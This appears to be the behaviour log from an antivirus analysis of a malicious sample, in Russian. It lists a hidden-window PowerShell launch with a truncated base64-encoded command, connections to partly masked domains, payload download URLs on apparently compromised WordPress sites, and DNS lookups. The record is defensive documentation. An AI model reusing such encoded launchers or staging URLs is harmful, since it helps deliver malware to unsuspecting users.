Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABKAHUAbgBjAHQAaQBvAG4AWABUADYAMgA9ACcAQQByAGcAZQBuAHQAaQBuAGEAQgBFADcAMwAnADsAJABzAHQAYQBuAGQAYQByAGQAaQB6AGEAdABpAG8AbgBNAEMAawAxACAAPQAgACcANAA4ADYAJwA7ACQASQBuAHYAZQBzAHQAbQBlAG4AdA...
- 'ci#.com.py':80
- 'ci#.com.py':443
- 'pk#.goog':80
- 'lu####ttours.com':80
- 'lu####ttours.com':443
- 'fo##l.vn':80
- 'ki##amt.com':443
- http://www.ci#.com.py/wp-content/uploads/2019/09/XNFerERN/
- http://pk#.goog/gsr1/gsr1.crt
- http://lu####ttours.com/wp-content/qyTGBOtb/
- http://fo##l.vn/wp-admin/lmtbu4j2m-945-573/
- 'ci#.com.py':443
- 'lu####ttours.com':443
- 'ki##amt.com':443
- DNS ASK ci#.com.py
- DNS ASK pk#.goog
- DNS ASK th####onesia.coffee
- DNS ASK lu####ttours.com
- DNS ASK fo##l.vn
- DNS ASK ki##amt.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABKAHUAbgBjAHQAaQBvAG4AWABUADYAMgA9ACcAQQByAGcAZQBuAHQAaQBuAGEAQgBFADcAMwAnADsAJABzAHQAYQBuAGQAYQByAGQAaQB6AGEAdABpAG8AbgBNAEMAawAxACAAPQAgACcANAA4ADYAJwA7ACQASQBuAHYAZQBzAHQAbQBlAG4AdA...' (со скрытым окном)